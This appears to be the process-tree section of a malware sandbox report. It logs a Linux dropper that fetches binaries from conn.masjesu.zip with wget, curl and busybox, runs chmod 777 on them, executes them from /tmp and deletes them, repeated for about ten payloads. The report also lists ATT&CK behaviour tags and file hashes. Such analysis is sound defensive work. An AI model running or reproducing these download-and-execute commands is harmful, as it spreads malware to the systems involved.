/usr/bin/wgetwget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
PID:944
-
-
/bin/chmodchmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵PID:958
-
-
/bin/chmodchmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:967
-
-
/bin/rmrm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:972
-
-
/bin/chmodchmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:979
-
-
/bin/chmodchmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:986
-
-
/bin/chmodchmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- System Network Configuration Discovery
PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:1000
-
-
/bin/chmodchmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:1003
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:1004
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1005
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:1007
-
-
/bin/chmodchmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- File and Directory Permissions Modification
PID:1008
-
-
/tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Executes dropped EXE
PID:1009
-
-
/bin/rmrm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:1010
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97